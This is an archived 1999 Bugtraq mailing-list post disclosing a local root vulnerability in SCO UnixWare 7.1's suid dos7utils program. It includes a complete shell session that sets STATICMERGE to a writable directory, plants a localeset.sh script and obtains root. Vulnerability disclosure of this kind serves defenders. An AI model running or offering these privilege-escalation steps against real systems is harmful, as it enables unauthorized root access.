Bugtraq mailing list archives
SCO UnixWare 7.1 local root exploit
From: btellier () USA NET (Brock Tellier)
Date: Tue, 5 Oct 1999 12:30:49 MDT
Greetings, A vulnerability exists in the /usr/lib/merge/dos7utils program (suid root by default) which allows any user to execute any command as root. The dos7utils program gets its localeset.sh exec path from the environment variable STATICMERGE. By setting this to a directory writable by us and setting the -f switch, we can have dos7utils run our program as follows: bash-2.02$ uname -a; id; pwd UnixWare fear71 5 7.1.0 i386 x86at SCO UNIX_SVR5 uid=101(xnec) gid=1(other) /usr/lib/merge bash-2.02$ export STATICMERGE=/tmp bash-2.02$ cat > /tmp/localeset.sh #!/bin/sh id bash-2.02$ chmod 700 /tmp/localeset.sh bash-2.02$ ./dos7utils -f bah uid=0(root) gid=1(other) groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit),10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp) bash-2.02$ ---- Searching through the securityfocus vulnerability archives yields 0 matches for search string "unixware", but several for "openserver". I thought this was rather strange, considering that SCO is discontinuing OpenServer after 5.0.5 in favor of the much more reliable (though not security-wise, evidently) UnixWare 7. And so begins my audit of the virgin Unixware 7 so soon after my incomplete audit of SCO 5.0.5. Brock Tellier UNIX Systems Administrator ____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1
Current thread:
- Re: Fix for ssh-1.2.27 symlink/bind problem Scott Gifford (Oct 04)
- <Possible follow-ups>
- Re: Fix for ssh-1.2.27 symlink/bind problem Scott Gifford (Oct 04)
- SCO UnixWare 7.1 local root exploit Brock Tellier (Oct 05)
- Re: Fix for ssh-1.2.27 symlink/bind problem Casper Dik (Oct 06)
- Re: Fix for ssh-1.2.27 symlink/bind problem Phillip Vandry (Oct 06)
- Re: Fix for ssh-1.2.27 symlink/bind problem Wietse Venema (Oct 06)
- Re: Fix for ssh-1.2.27 symlink/bind problem Markus Friedl (Oct 25)
- Re: Fix for ssh-1.2.27 symlink/bind problem Wietse Venema (Oct 25)
- Re: Fix for ssh-1.2.27 symlink/bind problem Markus Friedl (Oct 26)
- Re: Fix for ssh-1.2.27 symlink/bind problem Wietse Venema (Oct 27)
- ExpressFS 2.x FTPServer remotely exploitable buffer overflow vulnerability Luciano Martins (Jul 29)
- Vulnerability in CMail SMTP Server Version 2.4: Remotely exploitable buffer Luciano Martins (Jul 29)
- AW: Mac OS 9 Idle Lock Bug Flothow, Sebastian (Oct 29)